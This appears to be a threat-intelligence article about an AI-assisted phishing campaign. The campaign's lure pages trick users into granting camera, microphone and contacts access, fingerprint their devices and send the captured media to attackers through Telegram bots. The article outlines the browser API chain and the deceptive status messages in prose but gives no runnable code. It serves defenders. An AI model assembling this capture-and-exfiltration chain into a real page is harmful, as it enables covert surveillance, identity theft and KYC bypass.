A new AI-driven phishing campaign, uncovered by Cyble Research & Intelligence Labs (CRIL) demonstrates how attackers are moving beyond traditional credential theft and adopting more invasive, technology-driven tactics.
According to CRIL, the campaign has been active since early 2026 and relies on a wide range of social engineering lures, including themes like ID scanner, Telegram ID freezing, and “Health Fund AI.” These deceptive entry points are designed to trick users into granting access to hardware features such as cameras and microphones under the guise of verification or account recovery.
Once permissions are granted, the malicious scripts begin collecting extensive data. This includes images, video recordings, microphone audio, device specifications, contact details, and approximate geographic location. The stolen data is then transmitted to attacker-controlled systems via Telegram bots, making exfiltration quick and efficient.
Researchers also noted signs of AI-assisted code generation within the campaign’s infrastructure. Structured annotations and unusual emoji-based formatting embedded in the scripts suggest the use of generative AI tools to streamline development and deployment.
Infrastructure and Attack Mechanism
The campaign primarily uses the edgeone.app platform to host phishing pages, enabling scalable and low-cost deployment. These pages impersonate well-known platforms such as TikTok, Instagram, Telegram, Google Chrome, and even games like Flappy Bird to gain user trust.
Unlike traditional phishing attacks that rely on victims entering credentials, this AI-driven phishing campaign focuses on browser-level permissions. Once a user interacts with a phishing page, JavaScript code triggers permission prompts. If accepted, the script activates the device camera and begins capturing live data.
A key technique involves rendering a frame from a live video stream onto an HTML5 canvas using ctx.drawImage(), then converting it into a JPEG file via canvas.toBlob(). This file is immediately transmitted to attackers through the Telegram Bot API. The same process is used for video and audio recordings.
Expanded Data Collection Capabilities
The phishing framework goes beyond simple media capture. It performs extensive device fingerprinting using browser APIs such as:
- navigator.userAgent
- navigator.platform
- navigator.deviceMemory
- navigator.hardwareConcurrency
- navigator.connection
- navigator.getBattery
Through these methods, attackers gather detailed information about the victim’s device, including operating system, browser version, CPU capacity, RAM, network type, and battery status.
Additionally, the script retrieves the victim’s IP address via external services and enriches it with geolocation data such as country, city, latitude, and longitude. This information is aggregated and sent to attackers before further data collection begins.
The campaign also attempts to access contact lists using the browser’s Contacts Picker API. If users grant permission, names, phone numbers, and email addresses are extracted and transmitted.
Role of Telegram in Data Exfiltration
A notable aspect of this campaign is its reliance on Telegram for command-and-control (C2) operations. By using Telegram bots, attackers eliminate the need for complex backend infrastructure. Data such as images, videos, and audio files are sent directly via API methods like sendPhoto, sendVideo, and sendAudio.
This approach simplifies operations while providing attackers with immediate access to stolen information.
User Interface Deception
To maintain credibility, phishing pages display realistic status messages such as “Capturing photo,” “Sending to server,” and “Photo sent successfully.” These prompts mimic legitimate verification workflows, reinforcing the illusion of authenticity.
Once the data is captured and transmitted, the script shuts down the camera and resets the interface, leaving minimal visible traces of the attack.
Risks and Business Impact
The implications of this AI-driven phishing campaign are significant. By collecting biometric and contextual data, attackers gain powerful tools for:
- Identity theft and account takeover
- Bypassing video-based verification systems
- Targeted social engineering attacks
- Extortion using captured multimedia
For example, images and audio recordings could be used to impersonate victims or bypass KYC (Know Your Customer) systems. Device and location data allow attackers to craft highly personalized attacks, increasing their success rate.
Organizations face additional risks, including reputational damage, regulatory exposure, and financial losses. The use of impersonated brands further amplifies the threat by eroding trust in legitimate digital services.
One of the more unusual findings in this campaign is the presence of emojis embedded within the script’s operational logic. While uncommon in manually written malware, such patterns are linked to AI-assisted code generation. This suggests attackers may be leveraging generative AI tools to accelerate development and scale their operations.
